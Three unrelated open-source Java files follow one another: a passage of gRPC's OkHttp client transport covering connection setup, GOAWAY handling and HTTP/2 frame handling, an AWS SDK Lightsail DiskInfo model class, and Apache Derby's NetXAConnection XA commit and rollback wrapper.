    outboundFlow = new OutboundFlowController(this, frameWriter);
    // Connecting in the serializingExecutor, so that some stream operations like synStream
    // will be executed after connected.
    serializingExecutor.execute(new Runnable() {
      @Override
      public void run() {
        if (isForTest()) {
          // Test path: wire up the injected reader/writer instead of a socket.
          if (connectingCallback != null) {
            connectingCallback.run();
          }
          clientFrameHandler = new ClientFrameHandler(testFrameReader);
          executor.execute(clientFrameHandler);
          synchronized (lock) {
            maxConcurrentStreams = Integer.MAX_VALUE;
            startPendingStreams();
          }
          frameWriter.becomeConnected(testFrameWriter, socket);
          connectedFuture.set(null);
          return;
        }

        // Use closed source on failure so that the reader immediately shuts down.
        BufferedSource source = Okio.buffer(new Source() {
          @Override
          public long read(Buffer sink, long byteCount) {
            return -1;
          }

          @Override
          public Timeout timeout() {
            return Timeout.NONE;
          }

          @Override
          public void close() {}
        });
        Variant variant = new Http2();
        BufferedSink sink;
        Socket sock;
        try {
          sock = new Socket(address.getAddress(), address.getPort());
          if (sslSocketFactory != null) {
            sock = OkHttpTlsUpgrader.upgrade(
                sslSocketFactory, sock, getOverridenHost(), getOverridenPort(), connectionSpec);
          }
          sock.setTcpNoDelay(true);
          source = Okio.buffer(Okio.source(sock));
          sink = Okio.buffer(Okio.sink(sock));
        } catch (Exception e) {
          onException(e);
          return;
        } finally {
          // Always start the reader thread, even on failure (it reads the
          // closed placeholder source and shuts down immediately).
          clientFrameHandler = new ClientFrameHandler(variant.newReader(source, true));
          executor.execute(clientFrameHandler);
        }

        FrameWriter rawFrameWriter;
        synchronized (lock) {
          socket = sock;
          maxConcurrentStreams = Integer.MAX_VALUE;
          startPendingStreams();
        }

        rawFrameWriter = variant.newWriter(sink, true);
        frameWriter.becomeConnected(rawFrameWriter, socket);

        try {
          // Do these with the raw FrameWriter, so that they will be done in this thread,
          // and before any possible pending stream operations.
          rawFrameWriter.connectionPreface();
          Settings settings = new Settings();
          rawFrameWriter.settings(settings);
        } catch (Exception e) {
          onException(e);
          return;
        }
      }
    });
  }

  @Override
  public String toString() {
    return getLogId() + "(" + address + ")";
  }

  @Override
  public String getLogId() {
    return GrpcUtil.getLogId(this);
  }

  /**
   * Gets the overriden authority hostname. If the authority is overriden to be an invalid
   * authority, uri.getHost() will (rightly) return null, since the authority is no longer
   * an actual service. This method overrides the behavior for practical reasons. For example,
   * if an authority is in the form "invalid_authority" (note the "_"), rather than return null,
   * we return the input. This is because the return value, in conjunction with getOverridenPort,
   * are used by the SSL library to reconstruct the actual authority. It /already/ has a
   * connection to the port, independent of this function.
   *
   * <p>Note: if the defaultAuthority has a port number in it and is also bad, this code will do
   * the wrong thing. An example wrong behavior would be "invalid_host:443". Registry based
   * authorities do not have ports, so this is even more wrong than before. Sorry.
   */
  @VisibleForTesting
  String getOverridenHost() {
    URI uri = GrpcUtil.authorityToUri(defaultAuthority);
    if (uri.getHost() != null) {
      return uri.getHost();
    }
    return defaultAuthority;
  }

  /** Returns the port from the authority override, or the address's port. */
  @VisibleForTesting
  int getOverridenPort() {
    URI uri = GrpcUtil.authorityToUri(defaultAuthority);
    if (uri.getPort() != -1) {
      return uri.getPort();
    }
    return address.getPort();
  }

  /** Graceful shutdown: existing streams continue, new ones are rejected. */
  @Override
  public void shutdown() {
    synchronized (lock) {
      if (goAwayStatus != null) {
        return;
      }
      goAwayStatus = Status.UNAVAILABLE.withDescription("Transport stopped");
      listener.transportShutdown(goAwayStatus);
      stopIfNecessary();
      if (keepAliveManager != null) {
        keepAliveManager.onTransportShutdown();
        // KeepAliveManager should stop using the scheduler after onTransportShutdown gets called.
        scheduler = SharedResourceHolder.release(TIMER_SERVICE, scheduler);
      }
    }
  }

  /** Hard shutdown: every active and pending stream is failed with {@code reason}. */
  @Override
  public void shutdownNow(Status reason) {
    shutdown();
    synchronized (lock) {
      Iterator<Map.Entry<Integer, OkHttpClientStream>> it = streams.entrySet().iterator();
      while (it.hasNext()) {
        Map.Entry<Integer, OkHttpClientStream> entry = it.next();
        it.remove();
        entry.getValue().transportReportStatus(reason, false, new Metadata());
      }

      for (OkHttpClientStream stream : pendingStreams) {
        stream.transportReportStatus(reason, true, new Metadata());
      }
      pendingStreams.clear();
      maybeClearInUse();

      stopIfNecessary();
    }
  }

  @Override
  public Attributes getAttrs() {
    // TODO(zhangkun83): fill channel security attributes
    return Attributes.EMPTY;
  }

  /**
   * Gets all active streams as an array.
   */
  OkHttpClientStream[] getActiveStreams() {
    synchronized (lock) {
      return streams.values().toArray(EMPTY_STREAM_ARRAY);
    }
  }

  @VisibleForTesting
  ClientFrameHandler getHandler() {
    return clientFrameHandler;
  }

  @VisibleForTesting
  int getPendingStreamSize() {
    synchronized (lock) {
      return pendingStreams.size();
    }
  }

  /**
   * Finish all active streams due to an IOException, then close the transport.
   */
  void onException(Throwable failureCause) {
    Preconditions.checkNotNull(failureCause, "failureCause");
    Status status = Status.UNAVAILABLE.withCause(failureCause);
    startGoAway(0, ErrorCode.INTERNAL_ERROR, status);
  }

  /**
   * Send GOAWAY to the server, then finish all active streams and close the transport.
   */
  private void onError(ErrorCode errorCode, String moreDetail) {
    startGoAway(0, errorCode, toGrpcStatus(errorCode).augmentDescription(moreDetail));
  }

  // Puts the transport in go-away state, fails every stream with an id above
  // lastKnownStreamId, and sends GOAWAY when errorCode is non-null.
  private void startGoAway(int lastKnownStreamId, ErrorCode errorCode, Status status) {
    synchronized (lock) {
      if (goAwayStatus == null) {
        goAwayStatus = status;
        listener.transportShutdown(status);
      }
      if (errorCode != null && !goAwaySent) {
        // Send GOAWAY with lastGoodStreamId of 0, since we don't expect any server-initiated
        // streams. The GOAWAY is part of graceful shutdown.
        goAwaySent = true;
        frameWriter.goAway(0, errorCode, new byte[0]);
      }

      Iterator<Map.Entry<Integer, OkHttpClientStream>> it = streams.entrySet().iterator();
      while (it.hasNext()) {
        Map.Entry<Integer, OkHttpClientStream> entry = it.next();
        if (entry.getKey() > lastKnownStreamId) {
          it.remove();
          entry.getValue().transportReportStatus(status, false, new Metadata());
        }
      }

      for (OkHttpClientStream stream : pendingStreams) {
        stream.transportReportStatus(status, true, new Metadata());
      }
      pendingStreams.clear();
      maybeClearInUse();

      stopIfNecessary();
    }
  }

  /**
   * Called when a stream is closed, we do things like:
   * <ul>
   * <li>Removing the stream from the map.
   * <li>Optionally reporting the status.
   * <li>Starting pending streams if we can.
   * <li>Stopping the transport if this is the last live stream under a go-away status.
   * </ul>
   *
   * @param streamId the Id of the stream.
   * @param status the final status of this stream, null means no need to report.
   * @param errorCode reset the stream with this ErrorCode if not null.
   */
  void finishStream(int streamId, @Nullable Status status, @Nullable ErrorCode errorCode) {
    synchronized (lock) {
      OkHttpClientStream stream = streams.remove(streamId);
      if (stream != null) {
        if (errorCode != null) {
          frameWriter.rstStream(streamId, ErrorCode.CANCEL);
        }
        if (status != null) {
          boolean isCancelled = (status.getCode() == Code.CANCELLED
              || status.getCode() == Code.DEADLINE_EXCEEDED);
          stream.transportReportStatus(status, isCancelled, new Metadata());
        }
        if (!startPendingStreams()) {
          stopIfNecessary();
          maybeClearInUse();
        }
      }
    }
  }

  /**
   * When the transport is in goAway state, we should stop it once all active streams finish.
   */
  @GuardedBy("lock")
  void stopIfNecessary() {
    if (!(goAwayStatus != null && streams.isEmpty() && pendingStreams.isEmpty())) {
      return;
    }
    if (stopped) {
      return;
    }
    stopped = true;

    if (ping != null) {
      ping.failed(getPingFailure());
      ping = null;
    }

    if (!goAwaySent) {
      // Send GOAWAY with lastGoodStreamId of 0, since we don't expect any server-initiated
      // streams. The GOAWAY is part of graceful shutdown.
      goAwaySent = true;
      frameWriter.goAway(0, ErrorCode.NO_ERROR, new byte[0]);
    }

    // We will close the underlying socket in the writing thread to break out the reader
    // thread, which will close the frameReader and notify the listener.
    frameWriter.close();
  }

  @GuardedBy("lock")
  private void maybeClearInUse() {
    if (inUse) {
      if (pendingStreams.isEmpty() && streams.isEmpty()) {
        inUse = false;
        listener.transportInUse(false);
        if (keepAliveManager != null) {
          // We don't have any active streams. No need to do keepalives any more.
          // Again, we have to call this inside the lock to avoid the race between onTransportIdle
          // and onTransportActive.
          keepAliveManager.onTransportIdle();
        }
      }
    }
  }

  @GuardedBy("lock")
  private void setInUse() {
    if (!inUse) {
      inUse = true;
      listener.transportInUse(true);
      if (keepAliveManager != null) {
        // We have a new stream. We might need to do keepalives now.
        // Note that we have to do this inside the lock to avoid calling
        // KeepAliveManager.onTransportActive and KeepAliveManager.onTransportIdle in the wrong
        // order.
        keepAliveManager.onTransportActive();
      }
    }
  }

  // Exception reported to ping callbacks when the transport is unusable.
  private Throwable getPingFailure() {
    synchronized (lock) {
      if (goAwayStatus != null) {
        return goAwayStatus.asException();
      } else {
        return Status.UNAVAILABLE.withDescription("Connection closed").asException();
      }
    }
  }

  // True if streamId could have been assigned by this client (odd and below
  // the next id to hand out).
  boolean mayHaveCreatedStream(int streamId) {
    synchronized (lock) {
      return streamId < nextStreamId && (streamId & 1) == 1;
    }
  }

  OkHttpClientStream getStream(int streamId) {
    synchronized (lock) {
      return streams.get(streamId);
    }
  }

  /**
   * Returns a Grpc status corresponding to the given ErrorCode.
   */
  @VisibleForTesting
  static Status toGrpcStatus(ErrorCode code) {
    Status status = ERROR_CODE_TO_STATUS.get(code);
    return status != null ? status
        : Status.UNKNOWN.withDescription("Unknown http2 error code: " + code.httpCode);
  }

  /**
   * Runnable which reads frames and dispatches them to in flight calls.
   */
  @VisibleForTesting
  class ClientFrameHandler implements FrameReader.Handler, Runnable {
    FrameReader frameReader;
    // True until the first SETTINGS frame is seen; used to fire transportReady once.
    boolean firstSettings = true;

    ClientFrameHandler(FrameReader frameReader) {
      this.frameReader = frameReader;
    }

    @Override
    public void run() {
      String threadName = Thread.currentThread().getName();
      Thread.currentThread().setName("OkHttpClientTransport");
      try {
        // Read until the underlying socket closes.
        while (frameReader.nextFrame(this)) {
          if (keepAliveManager != null) {
            keepAliveManager.onDataReceived();
          }
        }
        // frameReader.nextFrame() returns false when the underlying read encounters an IOException,
        // it may be triggered by the socket closing, in such case, the startGoAway() will do
        // nothing, otherwise, we finish all streams since it's a real IO issue.
        startGoAway(0, ErrorCode.INTERNAL_ERROR,
            Status.UNAVAILABLE.withDescription("End of stream or IOException"));
      } catch (Exception t) {
        // TODO(madongfly): Send the exception message to the server.
        startGoAway(0, ErrorCode.PROTOCOL_ERROR, Status.UNAVAILABLE.withCause(t));
      } finally {
        try {
          frameReader.close();
        } catch (IOException ex) {
          log.log(Level.INFO, "Exception closing frame reader", ex);
        }
        listener.transportTerminated();
        // Restore the original thread name.
        Thread.currentThread().setName(threadName);
      }
    }

    /**
     * Handle a HTTP2 DATA frame.
     */
    @Override
    public void data(boolean inFinished, int streamId, BufferedSource in, int length)
        throws IOException {
      OkHttpClientStream stream = getStream(streamId);
      if (stream == null) {
        if (mayHaveCreatedStream(streamId)) {
          // Data for a stream we already finished: reset it and discard the bytes.
          frameWriter.rstStream(streamId, ErrorCode.INVALID_STREAM);
          in.skip(length);
        } else {
          onError(ErrorCode.PROTOCOL_ERROR, "Received data for unknown stream: " + streamId);
          return;
        }
      } else {
        // Wait until the frame is complete.
        in.require(length);

        Buffer buf = new Buffer();
        buf.write(in.buffer(), length);
        synchronized (lock) {
          stream.transportDataReceived(buf, inFinished);
        }
      }

      // connection window update
      connectionUnacknowledgedBytesRead += length;
      if (connectionUnacknowledgedBytesRead >= Utils.DEFAULT_WINDOW_SIZE / 2) {
        frameWriter.windowUpdate(0, connectionUnacknowledgedBytesRead);
        connectionUnacknowledgedBytesRead = 0;
      }
    }

    /**
     * Handle HTTP2 HEADER and CONTINUATION frames.
     */
    @Override
    public void headers(boolean outFinished,
        boolean inFinished,
        int streamId,
        int associatedStreamId,
        List<Header> headerBlock,
        HeadersMode headersMode) {
      boolean unknownStream = false;
      synchronized (lock) {
        OkHttpClientStream stream = streams.get(streamId);
        if (stream == null) {
          if (mayHaveCreatedStream(streamId)) {
            frameWriter.rstStream(streamId, ErrorCode.INVALID_STREAM);
          } else {
            unknownStream = true;
          }
        } else {
          stream.transportHeadersReceived(headerBlock, inFinished);
        }
      }
      if (unknownStream) {
        // We don't expect any server-initiated streams.
        onError(ErrorCode.PROTOCOL_ERROR, "Received header for unknown stream: " + streamId);
      }
    }

    @Override
    public void rstStream(int streamId, ErrorCode errorCode) {
      finishStream(streamId, toGrpcStatus(errorCode).augmentDescription("Rst Stream"), null);
    }

    @Override
    public void settings(boolean clearPrevious, Settings settings) {
      synchronized (lock) {
        if (OkHttpSettingsUtil.isSet(settings, OkHttpSettingsUtil.MAX_CONCURRENT_STREAMS)) {
          int receivedMaxConcurrentStreams = OkHttpSettingsUtil.get(
              settings, OkHttpSettingsUtil.MAX_CONCURRENT_STREAMS);
          maxConcurrentStreams = receivedMaxConcurrentStreams;
        }

        if (OkHttpSettingsUtil.isSet(settings, OkHttpSettingsUtil.INITIAL_WINDOW_SIZE)) {
          int initialWindowSize = OkHttpSettingsUtil.get(
              settings, OkHttpSettingsUtil.INITIAL_WINDOW_SIZE);
          outboundFlow.initialOutboundWindowSize(initialWindowSize);
        }
        if (firstSettings) {
          listener.transportReady();
          firstSettings = false;
        }
        startPendingStreams();
      }
      frameWriter.ackSettings(settings);
    }

    @Override
    public void ping(boolean ack, int payload1, int payload2) {
      if (!ack) {
        // Peer-initiated ping: echo it back.
        frameWriter.ping(true, payload1, payload2);
      } else {
        Http2Ping p = null;
        // Reassemble the 8-byte payload from its two 32-bit halves.
        long ackPayload = (((long) payload1) << 32) | (payload2 & 0xffffffffL);
        synchronized (lock) {
          if (ping != null) {
            if (ping.payload() == ackPayload) {
              p = ping;
              ping = null;
            } else {
              log.log(Level.WARNING, String.format("Received unexpected ping ack. "
                  + "Expecting %d, got %d", ping.payload(), ackPayload));
            }
          } else {
            log.warning("Received unexpected ping ack. No ping outstanding");
          }
        }
        // don't complete it while holding lock since callbacks could run immediately
        if (p != null) {
          p.complete();
        }
      }
    }

    @Override
    public void ackSettings() {
      // Do nothing currently.
    }

    @Override
    public void goAway(int lastGoodStreamId, ErrorCode errorCode, ByteString debugData) {
      Status status = GrpcUtil.Http2Error.statusForCode(errorCode.httpCode)
          .augmentDescription("Received Goaway");
      if (debugData != null && debugData.size() > 0) {
        // If a debug message was provided, use it.
        status = status.augmentDescription(debugData.utf8());
      }
      startGoAway(lastGoodStreamId, null, status);
    }

    @Override
    public void pushPromise(int streamId, int promisedStreamId, List<Header> requestHeaders)
        throws IOException {
      // We don't accept server initiated stream.
      frameWriter.rstStream(streamId, ErrorCode.PROTOCOL_ERROR);
    }

    @Override
    public void windowUpdate(int streamId, long delta) {
      if (delta == 0) {
        String errorMsg = "Received 0 flow control window increment.";
        if (streamId == 0) {
          onError(ErrorCode.PROTOCOL_ERROR, errorMsg);
        } else {
          finishStream(streamId, Status.INTERNAL.withDescription(errorMsg),
              ErrorCode.PROTOCOL_ERROR);
        }
        return;
      }

      boolean unknownStream = false;
      synchronized (lock) {
        if (streamId == Utils.CONNECTION_STREAM_ID) {
          outboundFlow.windowUpdate(null, (int) delta);
          return;
        }

        OkHttpClientStream stream = streams.get(streamId);
        if (stream != null) {
          outboundFlow.windowUpdate(stream, (int) delta);
        } else if (!mayHaveCreatedStream(streamId)) {
          unknownStream = true;
        }
      }
      if (unknownStream) {
        onError(ErrorCode.PROTOCOL_ERROR,
            "Received window_update for unknown stream: " + streamId);
      }
    }

    @Override
    public void priority(int streamId, int streamDependency, int weight, boolean exclusive) {
      // Ignore priority change.
// TODO(madongfly): log } @Override public void alternateService(int streamId, String origin, ByteString protocol, String host, int port, long maxAge) { // TODO(madongfly): Deal with alternateService propagation } } }
/* * Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.lightsail.model; import java.io.Serializable; import javax.annotation.Generated; import com.amazonaws.protocol.StructuredPojo; import com.amazonaws.protocol.ProtocolMarshaller; /** * <p> * Describes a disk. * </p> * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/lightsail-2016-11-28/DiskInfo" target="_top">AWS API * Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class DiskInfo implements Serializable, Cloneable, StructuredPojo { /** * <p> * The disk name. * </p> */ private String name; /** * <p> * The disk path. * </p> */ private String path; /** * <p> * The size of the disk in GB (e.g., <code>32</code>). * </p> */ private Integer sizeInGb; /** * <p> * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). * </p> */ private Boolean isSystemDisk; /** * <p> * The disk name. * </p> * * @param name * The disk name. */ public void setName(String name) { this.name = name; } /** * <p> * The disk name. * </p> * * @return The disk name. */ public String getName() { return this.name; } /** * <p> * The disk name. * </p> * * @param name * The disk name. * @return Returns a reference to this object so that method calls can be chained together. */ public DiskInfo withName(String name) { setName(name); return this; } /** * <p> * The disk path. * </p> * * @param path * The disk path. 
*/ public void setPath(String path) { this.path = path; } /** * <p> * The disk path. * </p> * * @return The disk path. */ public String getPath() { return this.path; } /** * <p> * The disk path. * </p> * * @param path * The disk path. * @return Returns a reference to this object so that method calls can be chained together. */ public DiskInfo withPath(String path) { setPath(path); return this; } /** * <p> * The size of the disk in GB (e.g., <code>32</code>). * </p> * * @param sizeInGb * The size of the disk in GB (e.g., <code>32</code>). */ public void setSizeInGb(Integer sizeInGb) { this.sizeInGb = sizeInGb; } /** * <p> * The size of the disk in GB (e.g., <code>32</code>). * </p> * * @return The size of the disk in GB (e.g., <code>32</code>). */ public Integer getSizeInGb() { return this.sizeInGb; } /** * <p> * The size of the disk in GB (e.g., <code>32</code>). * </p> * * @param sizeInGb * The size of the disk in GB (e.g., <code>32</code>). * @return Returns a reference to this object so that method calls can be chained together. */ public DiskInfo withSizeInGb(Integer sizeInGb) { setSizeInGb(sizeInGb); return this; } /** * <p> * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). * </p> * * @param isSystemDisk * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). */ public void setIsSystemDisk(Boolean isSystemDisk) { this.isSystemDisk = isSystemDisk; } /** * <p> * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). * </p> * * @return A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). */ public Boolean getIsSystemDisk() { return this.isSystemDisk; } /** * <p> * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). 
* </p> * * @param isSystemDisk * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). * @return Returns a reference to this object so that method calls can be chained together. */ public DiskInfo withIsSystemDisk(Boolean isSystemDisk) { setIsSystemDisk(isSystemDisk); return this; } /** * <p> * A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). * </p> * * @return A Boolean value indicating whether this disk is a system disk (has an operating system loaded on it). */ public Boolean isSystemDisk() { return this.isSystemDisk; } /** * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be * redacted from this string using a placeholder value. * * @return A string representation of this object. * * @see java.lang.Object#toString() */ @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("{"); if (getName() != null) sb.append("Name: ").append(getName()).append(","); if (getPath() != null) sb.append("Path: ").append(getPath()).append(","); if (getSizeInGb() != null) sb.append("SizeInGb: ").append(getSizeInGb()).append(","); if (getIsSystemDisk() != null) sb.append("IsSystemDisk: ").append(getIsSystemDisk()); sb.append("}"); return sb.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (obj instanceof DiskInfo == false) return false; DiskInfo other = (DiskInfo) obj; if (other.getName() == null ^ this.getName() == null) return false; if (other.getName() != null && other.getName().equals(this.getName()) == false) return false; if (other.getPath() == null ^ this.getPath() == null) return false; if (other.getPath() != null && other.getPath().equals(this.getPath()) == false) return false; if (other.getSizeInGb() == null ^ this.getSizeInGb() == null) return false; if (other.getSizeInGb() != null && 
other.getSizeInGb().equals(this.getSizeInGb()) == false) return false; if (other.getIsSystemDisk() == null ^ this.getIsSystemDisk() == null) return false; if (other.getIsSystemDisk() != null && other.getIsSystemDisk().equals(this.getIsSystemDisk()) == false) return false; return true; } @Override public int hashCode() { final int prime = 31; int hashCode = 1; hashCode = prime * hashCode + ((getName() == null) ? 0 : getName().hashCode()); hashCode = prime * hashCode + ((getPath() == null) ? 0 : getPath().hashCode()); hashCode = prime * hashCode + ((getSizeInGb() == null) ? 0 : getSizeInGb().hashCode()); hashCode = prime * hashCode + ((getIsSystemDisk() == null) ? 0 : getIsSystemDisk().hashCode()); return hashCode; } @Override public DiskInfo clone() { try { return (DiskInfo) super.clone(); } catch (CloneNotSupportedException e) { throw new IllegalStateException("Got a CloneNotSupportedException from Object.clone() " + "even though we're Cloneable!", e); } } @com.amazonaws.annotation.SdkInternalApi @Override public void marshall(ProtocolMarshaller protocolMarshaller) { com.amazonaws.services.lightsail.model.transform.DiskInfoMarshaller.getInstance().marshall(this, protocolMarshaller); } }
/*

   Derby - Class org.apache.derby.client.net.NetXAConnection

   Licensed to the Apache Software Foundation (ASF) under one or more
   contributor license agreements.  See the NOTICE file distributed with
   this work for additional information regarding copyright ownership.
   The ASF licenses this file to You under the Apache License, Version 2.0
   (the "License"); you may not use this file except in compliance with
   the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.

*/
package org.apache.derby.client.net;

import javax.transaction.xa.XAResource;

import org.apache.derby.client.am.SqlException;
import org.apache.derby.client.am.ClientStatement;
import org.apache.derby.client.ClientPooledConnection;
import org.apache.derby.client.am.ClientMessageId;
import org.apache.derby.client.am.LogWriter;
import org.apache.derby.client.BasicClientDataSource;
import org.apache.derby.shared.common.reference.SQLState;
import org.apache.derby.client.ClientAutoloadedDriver;

/**
 * Network-client wrapper around a {@link NetConnection} used for XA
 * (distributed-transaction) connections. Delegates the local-XA commit and
 * rollback request/reply flows to the underlying connection's agent.
 */
public class NetXAConnection {
    // The underlying physical connection everything in this class delegates to.
    private NetConnection netCon;
    //---------------------constructors/finalizer---------------------------------
    // For XA Connections

    /**
     *
     * The constructor for the NetXAConnection. The parameter
     * is set to <code>this</code> from ClientXAConnection when
     * it creates an instance of NetXAConnection. This is then
     * passed on the underlying NetConnection constructor and is
     * used to raise StatementEvents from any PreparedStatement that
     * would be created from that NetConnection.
     *
     * @param logWriter LogWriter object associated with this connection
     * @param user user id for this connection
     * @param password password for this connection
     * @param dataSource The DataSource object passed from the ClientXAConnection
     * object from which this constructor was called
     * @param rmId The Resource manager ID for XA Connections
     * @param isXAConn true if this is a XA connection
     * @param cpc The ClientPooledConnection object from which this
     * NetConnection constructor was called. This is used
     * to pass StatementEvents back to the pooledConnection
     * object
     * @throws SqlException on error
     *
     */
    public NetXAConnection(
            LogWriter logWriter,
            String user,
            String password,
            BasicClientDataSource dataSource,
            int rmId,
            boolean isXAConn,
            ClientPooledConnection cpc) throws SqlException {
        netCon = createNetConnection(logWriter, user, password, dataSource,
                rmId, isXAConn, cpc);
        // Fail fast if the server's XA support level is too old.
        checkPlatformVersion();
    }

    // Stores the DRDA correlation token on the underlying connection.
    public void setCorrelatorToken(byte[] crttoken) {
        netCon.crrtkn_ = crttoken;
    }

    // Associates the NetXAResource that manages XA calls for this connection.
    void setNetXAResource(NetXAResource xares) {
        netCon.xares_ = xares;
    }

    // Request/reply helpers for the local-XA commit flow.
    private void writeLocalXACommit_() throws SqlException {
        netCon.netAgent_.netConnectionRequest_.writeLocalXACommit(netCon);
    }

    private void readLocalXACommit_() throws SqlException {
        netCon.netAgent_.netConnectionReply_.readLocalXACommit(netCon);
    }

    // Request/reply helpers for the local-XA rollback flow.
    private void writeLocalXARollback_() throws SqlException {
        netCon.netAgent_.netConnectionRequest_.writeLocalXARollback(netCon);
    }

    private void readLocalXARollback_() throws SqlException {
        netCon.netAgent_.netConnectionReply_.readLocalXARollback(netCon);
    }

    // Called before statement execution; for Derby a local transaction needs no
    // explicit start message, so this only resets the XA exception accumulator.
    void writeTransactionStart(ClientStatement statement) throws SqlException {
        //KATHEY remove below after checking that we don't need it.
        if (!netCon.isXAConnection()) {
            return; // not a XA connection
        }

        // this is a XA connection
        int xaState = netCon.getXAState();
        netCon.xares_.exceptionsOnXA = null;
        //TODO: Looks like this can go and also the whole client indoubtTransaction code.
        /*
        if (xaState == XA_RECOVER) { // in recover, clean up and go to open-idle
            if (indoubtTransactions_ != null) {
                indoubtTransactions_.clear();
                indoubtTransactions_ = null;
                setXAState(XA_OPEN_IDLE);
                xaState = XA_OPEN_IDLE;
            }
        }*/

        // For derby we don't need to write transaction start for a local
        //transaction.  If autocommit is off we are good to go.
        return;
    }

    // Writes a commit request, but only when the connection is not currently
    // associated with a global XA transaction (T0 not-associated state).
    void writeCommit() throws SqlException {
        // this logic must be in sync with willAutoCommitGenerateFlow() logic
        int xaState = netCon.getXAState();
        if (xaState == netCon.XA_T0_NOT_ASSOCIATED){
            netCon.xares_.callInfoArray_[
                    netCon.xares_.conn_.currXACallInfoOffset_
                    ].xid_ = NetXAResource.nullXid;
            writeLocalXACommit_();
        }
    }

    // Reads the commit reply and surfaces any accumulated XA error as SqlException.
    void readCommit() throws SqlException {
        int xaState = netCon.getXAState();
        // NOTE(review): readCommit/readRollback index callInfoArray_ via
        // netCon.currXACallInfoOffset_ while the write side uses
        // netCon.xares_.conn_.currXACallInfoOffset_ — presumably the same offset.
        NetXACallInfo callInfo = netCon.xares_.callInfoArray_
                [netCon.currXACallInfoOffset_];
        callInfo.xaRetVal_ = XAResource.XA_OK; // initialize XARETVAL
        if (xaState == netCon.XA_T0_NOT_ASSOCIATED) {
            readLocalXACommit_();
            //TODO: Remove
            //setXAState(XA_LOCAL);
        }
        if (callInfo.xaRetVal_ != XAResource.XA_OK) { // xaRetVal has possible
            // error, format it
            callInfo.xaFunction_ = NetXAResource.XAFUNC_COMMIT;
            netCon.xares_.xaRetValErrorAccumSQL(callInfo, 0);
            callInfo.xaRetVal_ = XAResource.XA_OK; // re-initialize XARETVAL
            throw netCon.xares_.exceptionsOnXA;
        }
    }

    // Writes a local-XA rollback request with the null XID.
    void writeRollback() throws SqlException {
        netCon.xares_.callInfoArray_[
                netCon.xares_.conn_.currXACallInfoOffset_
                ].xid_ = netCon.xares_.nullXid;
        writeLocalXARollback_();
    }

    // Reads the rollback reply, surfaces any XA error, and returns the
    // connection to the T0 not-associated state.
    void readRollback() throws SqlException {
        NetXACallInfo callInfo = netCon.xares_.callInfoArray_
                [netCon.currXACallInfoOffset_];
        callInfo.xaRetVal_ = XAResource.XA_OK; // initialize XARETVAL
        readLocalXARollback_();

        if (callInfo.xaRetVal_ != XAResource.XA_OK) { // xaRetVal has possible
            // error, format it
            callInfo.xaFunction_ = NetXAResource.XAFUNC_ROLLBACK;
            netCon.xares_.xaRetValErrorAccumSQL(callInfo, 0);
            callInfo.xaRetVal_ = XAResource.XA_OK; // re-initialize XARETVAL
            throw netCon.xares_.exceptionsOnXA;
        }

        // for all XA connections
        // TODO:KATHEY - Do we need this?
        netCon.setXAState(netCon.XA_T0_NOT_ASSOCIATED);
    }

    /**
     * Returns underlying net connection
     * @return NetConnection
     */
    public NetConnection getNetConnection () {
        return netCon;
    }

    // Verifies the server reports at least XA host version 8; otherwise raises
    // NET_WRONG_XA_VERSION for the supported platforms.
    private void checkPlatformVersion() throws SqlException {
        int supportedVersion;

        supportedVersion = 8;

        if (netCon.xaHostVersion_ >= supportedVersion) {
            // supported version, return
            return;
        }

        // unsupported version for platform
        String platform = null;
        platform = "Linux, Unix, Windows";
        throw new SqlException(netCon.agent_.logWriter_,
            new ClientMessageId(SQLState.NET_WRONG_XA_VERSION),
            platform, supportedVersion, netCon.xaHostVersion_);
    }

    /**
     *
     * Creates NetConnection for the supported version of jdbc.
     * This method can be overwritten to return NetConnection
     * of the supported jdbc version.
     * @param logWriter LogWriter object associated with this connection
     * @param user user id for this connection
     * @param password password for this connection
     * @param dataSource The DataSource object passed from the ClientXAConnection
     * object from which this constructor was called
     * @param rmId The Resource manager ID for XA Connections
     * @param isXAConn true if this is a XA connection
     * @param cpc The ClientPooledConnection object from which this
     * NetConnection constructor was called. This is used
     * to pass StatementEvents back to the pooledConnection
     * object
     * @return NetConnection
     *
     */
    private NetConnection createNetConnection (
            LogWriter logWriter,
            String user,
            String password,
            BasicClientDataSource dataSource,
            int rmId,
            boolean isXAConn,
            ClientPooledConnection cpc) throws SqlException {
        return (NetConnection)ClientAutoloadedDriver.getFactory().newNetConnection
            (logWriter, user, password,dataSource, rmId, isXAConn,cpc);
    }
}
